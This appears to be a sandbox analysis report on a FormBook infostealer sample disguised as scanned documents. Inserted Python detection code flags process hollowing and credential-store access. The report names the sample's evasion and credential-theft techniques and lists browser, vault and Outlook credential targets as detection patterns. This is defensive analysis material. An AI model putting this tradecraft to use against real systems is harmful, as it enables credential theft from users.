            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C0770
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036E4750
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036BC7C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DC6E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C0535
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03780591
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03772446
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03764420
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0376E4F6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377AB40
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03776BD7
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036BEA80
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036D6962
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C29A0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0378A9A6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036CA840
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C2840
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036EE8F0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036A68B8
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03734F40
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03762F30
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03702F28
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036E0F30
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036B2FC8
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0373EFA0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C0E59
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377EE26
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377EEDB
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377CE93
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036D2E90
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0375CD1F
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036CAD00
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036BADE0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036D8DBF
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C0C00
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036B0CF2
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03760CB5
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036AD34C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377132D
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0370739A
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037612ED
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DD2F0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DB2C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C52A0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036F516C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0378B16B
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036AF172
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036CB1B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377F0E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037770E9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C70C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0376F0CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377F7B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_037716CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03777571
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0375D5B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036B1460
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377F43F
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377FB76
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03735BF0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036FDBF9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DFB80
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03733A6C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03777A46
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377FA49
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0376DAC6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03705AA0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03761AA3
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0375DAAC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C9950
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DB950
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03755910
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0372D800
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C38E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377FF09
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377FFB1
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C1F92
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C9EB0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03777D73
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036C3D40
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03771D5A
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_036DFDC0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_03739C32
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0377FCF2
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B21650
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B3A080
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B23170
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B2316B
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B1CA80
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B1AB00
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B1C860
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02B1C858
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0332A2E3
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0332B028
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0332BB04
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0332BFBC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0332BC24
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: String function: 002A0A30 appears 46 times
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Code function: String function: 0029F9F2 appears 31 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 0372EA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 0373F290 appears 103 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 03707E54 appears 99 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 036F5130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 036AB970 appears 260 times
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1656099998.00000000039FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned Docs from Emnes Metal Sdn Bhd_.exe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1656744327.00000000038A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned Docs from Emnes Metal Sdn Bhd_.exe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F37B5 GetLastError,FormatMessageW,0_2_002F37B5
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E10BF AdjustTokenPrivileges,CloseHandle,0_2_002E10BF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002E16C3
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002F51CD
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0030A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0030A67C
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_002F648E
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002842A2
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeFile created: C:\Users\user\AppData\Local\Temp\aut8DF2.tmpJump to behavior
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000004.00000003.2132258757.0000000003190000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2132042421.0000000003170000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeReversingLabs: Detection: 71%
            Source: unknownProcess created: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
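            The process chain above is the FormBook hallmark: a user-dropped executable starts a 32-bit svchost.exe whose command line is the dropper's own path (process hollowing), a copied payload in a random Program Files (x86) directory starts schtasks.exe with no arguments, and that schtasks.exe then launches Firefox. The following is an added example, not code from the report or from Joe Sandbox, showing how those three anomalies can be expressed as rules over process-creation events. The event records are constructed from the report's process tree; the benign services.exe-parented svchost.exe event and the rule names are assumptions.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessCreate:
    """One process-creation event (Sysmon EID 1 style), constructed for this example."""
    image: str
    command_line: str
    parent_image: str


def _base(path: str) -> str:
    return ntpath.basename(path.strip().strip('"')).lower()


def split_command_line(cmd: str):
    """Return (executable basename, remaining arguments) for a Windows command line."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        exe, rest = (cmd[1:end], cmd[end + 1:]) if end > 0 else (cmd[1:], "")
    else:
        exe, _, rest = cmd.partition(" ")
    return _base(exe), rest.strip()


def analyze(ev: ProcessCreate):
    """Return the list of rule names this event triggers (empty for benign events)."""
    findings = []
    image = _base(ev.image)
    parent = _base(ev.parent_image)
    cl_image, args = split_command_line(ev.command_line)
    # Hollowed host: the image on disk is svchost.exe but the command line names another binary.
    if cl_image != image:
        findings.append("commandline-image-mismatch")
    # Legitimate svchost.exe instances are started by services.exe.
    if image == "svchost.exe" and parent != "services.exe":
        findings.append("svchost-unexpected-parent")
    # schtasks.exe run without /Create, /Query etc. does nothing useful; here it is only an injection host.
    if image == "schtasks.exe" and not args:
        findings.append("schtasks-without-arguments")
    # schtasks.exe is a CLI tool; it does not normally spawn children, let alone a browser.
    if parent == "schtasks.exe":
        findings.append("child-of-schtasks")
    return findings


def run(events):
    return [(ev.image, analyze(ev)) for ev in events]


# Constructed events: EVENTS[0] is an assumed benign baseline, the rest follow the report's tree.
EVENTS = [
    ProcessCreate(r"C:\Windows\System32\svchost.exe",
                  r"C:\Windows\System32\svchost.exe -k netsvcs -p",
                  r"C:\Windows\System32\services.exe"),
    ProcessCreate(r"C:\Windows\SysWOW64\svchost.exe",
                  r'"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"',
                  r"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"),
    ProcessCreate(r"C:\Windows\SysWOW64\schtasks.exe",
                  r'"C:\Windows\SysWOW64\schtasks.exe"',
                  r"C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe"),
    ProcessCreate(r"C:\Program Files\Mozilla Firefox\firefox.exe",
                  r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
                  r"C:\Windows\SysWOW64\schtasks.exe"),
]

if __name__ == "__main__":
    for image, hits in run(EVENTS):
        print(f"{image}: {hits or 'clean'}")
```

            The command-line/image comparison is the most robust of the four: it does not depend on which system binary the loader picked as its host, and FormBook rotates that choice between runs.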
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static file information: File size 1261056 > 1048576
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
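            The stealer stage of this sample runs inside schtasks.exe: it loads winsqlite3.dll, vaultcli.dll and dpapi.dll, opens the Outlook profile key, and carries the Chromium login-database schema (the password_notes table) in memory, which is not how a task-scheduler CLI behaves. The following is an added example, not code from the report, that scores credential-store access by process. It assumes a simple event shape (image, kind, target) and a fixed list of expected owners; the Chrome "Login Data" read is a constructed event and not one the report records.

```python
import ntpath
import re
from collections import defaultdict

# Credential-related DLLs seen loaded into schtasks.exe in the report.
CRED_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}

# Files that hold browser credentials, keyed by the family that should own them.
STORE_PATTERNS = [
    ("firefox", re.compile(r"\\(profiles\.ini|logins\.json|key4\.db|cookies\.sqlite)$", re.I)),
    ("chromium", re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.I)),
]
OUTLOOK_PROFILE_RE = re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\[\d.]+\\Outlook\\Profiles", re.I)
CHROMIUM_SCHEMA_RE = re.compile(r"CREATE TABLE (logins|password_notes)\b")

# Assumption: only these images legitimately touch the corresponding store.
EXPECTED_OWNERS = {
    "firefox": {"firefox.exe"},
    "chromium": {"chrome.exe", "msedge.exe"},
    "outlook": {"outlook.exe"},
}


def classify(kind, target):
    """Map an event to the credential-store family it touches, or None."""
    if kind == "file_read":
        for family, rx in STORE_PATTERNS:
            if rx.search(target):
                return family
    elif kind == "reg_open" and OUTLOOK_PROFILE_RE.match(target):
        return "outlook"
    elif kind == "memory_string" and CHROMIUM_SCHEMA_RE.search(target):
        return "chromium"
    return None


def credential_findings(events):
    """Return (process, finding) pairs for processes touching stores they do not own."""
    findings = []
    dll_loads = defaultdict(set)
    for image, kind, target in events:
        proc = ntpath.basename(image).lower()
        if kind == "image_load":
            if target.lower() in CRED_DLLS:
                dll_loads[proc].add(target.lower())
            continue
        family = classify(kind, target)
        if family and proc not in EXPECTED_OWNERS[family]:
            findings.append((proc, f"touches-{family}-credential-store"))
    all_owners = set().union(*EXPECTED_OWNERS.values())
    for proc, dlls in sorted(dll_loads.items()):
        # Two or more of sqlite + vault + DPAPI in a non-browser, non-mail process is the stealer signature.
        if len(dlls) >= 2 and proc not in all_owners:
            findings.append((proc, "credential-dll-cluster:" + ",".join(sorted(dlls))))
    return findings


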